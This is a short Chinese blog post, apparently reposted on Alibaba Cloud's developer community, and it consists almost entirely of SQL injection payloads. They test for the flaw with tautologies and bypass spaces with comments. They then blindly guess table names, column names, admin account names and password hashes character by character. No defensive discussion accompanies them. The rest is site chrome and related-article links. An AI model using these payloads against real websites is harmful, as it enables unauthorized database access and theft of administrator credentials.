AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码

2017-10-01 1521
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

检查漏洞

1' or 1=1  or ('1' = '1
1' or 1=1)  or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1

猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1


猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1

猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1)  and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' )  and '1' = '1

猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635   and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a')  and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1




本文转自黄聪博客园博客,原文链接:http://www.cnblogs.com/huangcong/archive/2011/07/16/2108073.html,如需转载请自行联系原作者

文章标签:
SQL
数据库
安全
关键词:
SQL数据库
数据库sql
SQL漏洞
代码数据库
代码SQL
老朱教授
目录
相关文章
路边两盏灯
|
SQL 自然语言处理 数据库
【Azure Developer】分享两段Python代码处理表格(CSV格式)数据 : 根据每列的内容生成SQL语句
本文介绍了使用Python Pandas处理数据收集任务中格式不统一的问题。针对两种情况:服务名对应多人拥有状态(1/0表示),以及服务名与人名重复列的情况,分别采用双层for循环和字典数据结构实现数据转换,最终生成Name对应的Services列表(逗号分隔)。此方法高效解决大量数据的人工处理难题,减少错误并提升效率。文中附带代码示例及执行结果截图,便于理解和实践。
路边两盏灯
314 5
威哥爱编程
|
SQL Java 数据库连接
如何在 Java 代码中使用 JSqlParser 解析复杂的 SQL 语句?
大家好,我是 V 哥。JSqlParser 是一个用于解析 SQL 语句的 Java 库,可将 SQL 解析为 Java 对象树,支持多种 SQL 类型(如 `SELECT`、`INSERT` 等)。它适用于 SQL 分析、修改、生成和验证等场景。通过 Maven 或 Gradle 安装后,可以方便地在 Java 代码中使用。
威哥爱编程
4538 11
技能实验室
|
关系型数据库 MySQL 数据库连接
python脚本:连接数据库,检查直播流是否可用
【10月更文挑战第13天】本脚本使用 `mysql-connector-python` 连接MySQL数据库,检查 `live_streams` 表中每个直播流URL的可用性。通过 `requests` 库发送HTTP请求,输出每个URL的检查结果。需安装 `mysql-connector-python` 和 `requests` 库,并配置数据库连接参数。
技能实验室
355 68
1100237741946300
|
SQL 监控 关系型数据库
SQL错误代码1303解析与处理方法
在SQL编程和数据库管理中,遇到错误代码是常有的事,其中错误代码1303在不同数据库系统中可能代表不同的含义
1100237741946300
785 0
hju6meadphitw
|
SQL 关系型数据库 MySQL
创建SQL数据库的基本步骤与代码指南
在信息时代,数据管理显得尤为重要,其中数据库系统已成为信息技术架构的关键部分。而当我们谈论数据库系统时,SQL(结构化查询语言)无疑是其中最核心的工具之一。本文将详细介绍如何使用SQL创建数据库,包括编写相应的代码和必要的步骤。由于篇幅限制,本文可能无法达到您要求的2000字长度,但会尽量涵盖创建数
hju6meadphitw
545 3
1100237741946300
|
SQL 安全 关系型数据库
SQL错误代码1303解析与解决方案:深入理解并应对权限问题
在数据库管理和开发过程中,遇到错误代码是常见的事情,每个错误代码都代表着一种特定的问题
1100237741946300
641 0
蓝易云
|
SQL 监控 关系型数据库
MySQL数据库中如何检查一条SQL语句是否被回滚
检查MySQL中的SQL语句是否被回滚需要综合使用日志分析、事务状态监控和事务控制语句。理解和应用这些工具和命令,可以有效地管理和验证数据库事务的执行情况,确保数据的一致性和系统的稳定性。此外,熟悉事务的ACID属性和正确设置事务隔离级别对于预防数据问题和解决事务冲突同样重要。
蓝易云
429 2
rbvb2ms5saimy
|
SQL 分布式计算 大数据
大数据开发SQL代码编码原则和规范
这段SQL编码原则强调代码的功能完整性、清晰度、执行效率及可读性,通过统一关键词大小写、缩进量以及禁止使用模糊操作如select *等手段提升代码质量。此外,SQL编码规范还详细规定了代码头部信息、字段与子句排列、运算符前后间隔、CASE语句编写、查询嵌套、表别名定义以及SQL注释的具体要求,确保代码的一致性和维护性。
rbvb2ms5saimy
614 0
游客vphb4ae2je2zi
|
7月前
|
关系型数据库 MySQL 分布式数据库
阿里云PolarDB云原生数据库收费价格:MySQL和PostgreSQL详细介绍
阿里云PolarDB兼容MySQL、PostgreSQL及Oracle语法,支持集中式与分布式架构。标准版2核4G年费1116元起,企业版最高性能达4核16G,支持HTAP与多级高可用,广泛应用于金融、政务、互联网等领域,TCO成本降低50%。
游客vphb4ae2je2zi
1772 6
1243767626601764
|
7月前
|
SQL 关系型数据库 MySQL
Mysql数据恢复—Mysql数据库delete删除后数据恢复案例
本地服务器,操作系统为windows server。服务器上部署mysql单实例,innodb引擎,独立表空间。未进行数据库备份,未开启binlog。 人为误操作使用Delete命令删除数据时未添加where子句,导致全表数据被删除。删除后未对该表进行任何操作。需要恢复误删除的数据。 在本案例中的mysql数据库未进行备份,也未开启binlog日志,无法直接还原数据库。
1243767626601764
617 2

热门文章

最新文章

  • 1
    bboss 持久层sql xml配置文件编写和加载方法介绍
  • 2
    Sql Server 存储过程使用技巧
  • 3
    向ORACLE数据库中录入EXCEL表数据 之 PL/SQL Developer8.0
  • 4
    SQL 数据操作技巧:SELECT INTO、INSERT INTO SELECT 和 CASE 语
  • 5
    SQL Server 实验语句集合一
  • 6
    Oracle学习之路-SQL篇-连接查询
  • 7
    [转]从sql server 或 Access 中随即查询出几条数据
  • 8
    SQL Server 2014新功能 -- 延迟事务持久性(Delayed Transaction Durability)
  • 9
    DLA一键发现Tablestore元数据,轻松开启数据湖SQL分析之旅
  • 10
    SQL server 2005 PIVOT运算符的使用
  • 1
    现代化实时数仓 SelectDB 再次登顶 ClickBench 全球数据库分析性能排行榜!
    894
  • 2
    Python 操作 MySQL 数据库
    374
  • 3
    为什么数据库字符编码不一致会导致索引失效
    663
  • 4
    关系型数据库考虑索引的选择性
    397
  • 5
    关系型数据库选择正确的索引类型
    500
  • 6
    关系型数据库识别常查询字段
    513
  • 7
    SQL DB - 关系型数据库是如何工作的
    218
  • 8
    认识常见的一些数据库分类
    1706
  • 9
    关系型数据库中对索引的数目
    387
  • 10
    关系型数据库针对常查询的字段建立索引
    280

    • 相关课程

    更多
  • SQL调优与架构优化
  • SQL基础开发与应用
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践

    • 相关电子书

    更多
  • PolarDB NL2SQL: 帮助您写出准确、优化的SQL
  • 基于 Flink SQL + Paimon 构建流式湖仓新方
  • SQL智能诊断优化产品SQLess蚂蚁最佳实践
    • 下一篇
    开通oss服务